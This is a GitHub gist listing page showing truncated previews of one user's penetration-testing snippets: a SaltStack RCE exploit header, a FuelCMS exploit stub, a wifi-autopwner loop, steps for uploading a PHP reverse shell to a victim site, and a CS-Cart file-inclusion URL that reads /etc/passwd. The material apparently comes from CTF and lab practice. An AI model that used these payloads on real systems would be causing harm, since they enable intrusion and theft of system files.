momenbasel
/ gist:149eec9d8004e10414f68454decec538
Created
November 18, 2022 20:33
script for reading burpsuite scope and extract the urls
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python3 | |
| #script for reading burpsuite scope and extract the urls | |
| #requirements | |
| #python3 -m pip install -U find_domains iplookup python-whois | |
| #or pip3 install -r requirements.txt | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from netaddr import IPNetwork | |
| import socket | |
| from contextlib import closing | |
| ips = open("ips.txt", "r") #insert here IP file here | |
| ip_arr= (ips.read().strip()).split('\n') | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/python2.7 | |
| import subprocess | |
| import time | |
| while True: | |
| proc = subprocess.Popen('./wifi-autopwner.sh', stdin=subprocess.PIPE) | |
| proc.communicate("71") | |
| time.sleep(720000) |
momenbasel
/ saltstack.py
Created
October 2, 2020 13:48
edited Saltstack 3000.1 - Remote Code Execution
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Exploit Title: Saltstack 3000.1 - Remote Code Execution | |
| # Date: 2020-05-04 | |
| #edited: 2020-10-02 | |
| #the edit: instead of testing locally --first--, making it testing remotely | |
| # Exploit Author: Jasper Lievisse Adriaanse | |
| # Vendor Homepage: https://www.saltstack.com/ | |
| # Version: < 3000.2, < 2019.2.4, 2017.*, 2018.* | |
| # Tested on: Debian 10 with Salt 2019.2.0 | |
| # CVE : CVE-2020-11651 and CVE-2020-11652 | |
| # Description: Saltstack authentication bypass/remote code execution |
momenbasel
/ thm-OneLiner.js
Created
September 23, 2020 17:38
THM add 1 hour automatically, so you can hack peacefully without worrying about expiring the machine.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| setInterval(function(){addHour(); console.log(" : <= Added '1 Hour' times! \n"); }, 3600000); | |
| //adds one hour every half-hour |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| get PHP shells from http://pentestmonkey.net/tools/web-shells/php-reverse-shell | |
| edit IP && PORT | |
| Upload to file manager | |
| change the extension from .php to .phtml | |
| visit http://[victim]/skins/shell.phtml --> Profit. ...! |
momenbasel
/ gist:a683e991c8758e62704a28a2b90f087e
Created
September 23, 2020 15:22
CS-Cart 1.3.3 - 'classes_dir' Remote File Inclusion
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| http://www.site.com/[CS-Cart_path]/classes/phpmailer/class.cs_phpmailer.php?classes_dir=[evil_scripts]%00 | |
| example: | |
| http://www.site.com/[CS-Cart_path]/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00 |
momenbasel
/ tp.sh
Last active
June 6, 2024 21:26
tp-link Tl-wn722n v2/v3 monitoring && packet injection. atheros ar9271
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| apt update -y && apt upgrade -y && apt dist-upgrade | |
| sudo apt-get install linux-headers-$(uname -r) -y | |
| sudo apt install bc -y | |
| sudo rmmod r8188eu.ko | |
| git clone https://github.com/aircrack-ng/rtl8188eus | |
| cd rtl8188eus | |
| sudo -i | |
| echo "blacklist r8188eu.ko" > "/etc/modprobe.d/realtek.conf" | |
| exit | |
| make |
momenbasel
/ fuel.py
Created
September 18, 2020 21:08
python3 edited fuelCMS 1.4.1 exploit (https://www.exploit-db.com/exploits/47138) 2018-16763
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/python3 | |
| import requests | |
| import urllib | |
| url = "http://rhost/" | |
| def find_nth_overlapping(haystack, needle, n): | |
| start = haystack.find(needle) | |
| while start >= 0 and n > 1: | |
| start = haystack.find(needle, start+1) | |
| n -= 1 |
momenbasel
/ keybase
Created
August 22, 2020 22:32
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ### Keybase proof | |
| I hereby claim: | |
| * I am momenbasel on github. | |
| * I am momenbasel (https://keybase.io/momenbasel) on keybase. | |
| * I have a public key ASDSSlAYzNrBAGr2Rxh2xaRlZXUIZ3B2aMqyoeoQIvVFoQo | |
| To claim this, I am signing this object: |
NewerOlder